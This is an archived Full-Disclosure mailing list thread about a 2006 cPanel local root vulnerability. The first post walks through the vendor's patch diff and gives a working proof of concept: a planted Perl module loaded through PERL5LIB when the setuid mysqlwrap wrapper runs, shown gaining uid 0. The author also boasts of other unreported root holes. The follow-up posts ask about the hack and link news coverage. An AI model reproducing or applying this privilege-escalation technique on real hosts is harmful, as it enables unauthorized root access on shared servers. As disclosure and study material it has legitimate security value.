[Full-disclosure] cpanel exploit

[cp haquer]

It was pretty easy to figure out how the exploit worked once you saw their first attempt at fixing it.--- /usr/local/cpanel/bin/mysqladmin 2006-08-29 16:54:07.0 -0500+++ 
httpupdate.cpanel.net/cpanelsync/EDGE/bin/mysqladmin 2006-09-23 23:51:20.0 -0500@@ -5,9 +5,14 @@# This code is subject to the cpanel license. Unauthorized copying is prohibitedBEGIN {
- push( @INC, /usr/local/cpanel );+ unshift( @INC, /usr/local/cpanel );+ @INC=grep(!/^\./,@INC);+ @INC=grep(/^(\/usr\/lib\/perl|\/usr\/local\/lib\/perl|\/usr\/local\/cpanel)/,@INC);
+}So obviously the exploit involves inserting things into @INC when this script is ran as root. So, how is this script ran as root?lrwxrwxrwx 1 root root /usr/local/cpanel/bin/mysqlwrap - cpwrap*
-rwsr-xr-x 1 root wheel /usr/local/cpanel/bin/cpwrap*Through the setuid program mysqlwrap of course! So the only quesiton is how to insert things into @INC. There are 2 ways that I could find, a command line argument to perl, or the PERL5LIB environment variable. Obviously, the PERL5LIB environment variable seems like a good bet.
[EMAIL PROTECTED] [~]# cat ~/OMGWTFLOL/strict.pmdie(my id is $\n);[EMAIL PROTECTED] [~]# PERL5LIB=/home/domainc/OMGWTFLOL /usr/local/cpanel/bin/mysqlwrap ADDDB
bDatabase Created/bbrAdded the database .my id is 0Compilation failed in require at /usr/local/cpanel/Cpanel/Version.pm line 8.BEGIN failed--compilation aborted at /usr/local/cpanel/Cpanel/Version.pm line 
8.Compilation failed in require at /usr/local/cpanel/bin/mysqladmin line 11.BEGIN failed--compilation aborted at /usr/local/cpanel/bin/mysqladmin line 11.Smart readers will realize that the above patch is pretty stupid attempt at stopping the exploit. Several hosting companies with hacked servers had to intervene to make sure cPanel fixed it correctly. In new verisons of cPanel, cpwrap now appears to clean out environment variables before executing things. But don't worry, there are several local root exploits all over cPanel waiting to be discovered. I have discovered 2 more on the same day that I discovered how this one works.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] cpanel exploit

[Todd Burroughs]

Anyone have any info on this cpanel exploit.   I have a friend who found it
pretty open to full user level acess, but not root.

I'm curious to know what the hole is/was.

http://www.thewhir.com/marketwatch/092706_Web_Hosts_Hit_by_Hackers.cfm

http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_security_hole_exploited_in_mass_hack.html

Todd

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

Jesus died for your sins, make it worth his time.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] cpanel exploit

[Rob Lemos]

On Fri, 2006-09-29 at 06:56 -0400, Todd Burroughs wrote:
 Anyone have any info on this cpanel exploit.   I have a friend who found it
 pretty open to full user level acess, but not root.
 
 I'm curious to know what the hole is/was.
 
 http://www.thewhir.com/marketwatch/092706_Web_Hosts_Hit_by_Hackers.cfm
 
 http://news.netcraft.com/archives/2006/09/23/hostgator_cpanel_security_hole_exploited_in_mass_hack.html

More information here as well:
http://www.securityfocus.com/news/11415

-- 
| robert lemos | [EMAIL PROTECTED] | 
| editor-at-large | securityfocus |
| security watch columnist | pc magazine |
| technology  science journalist | http://www.robertlemos.com |

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/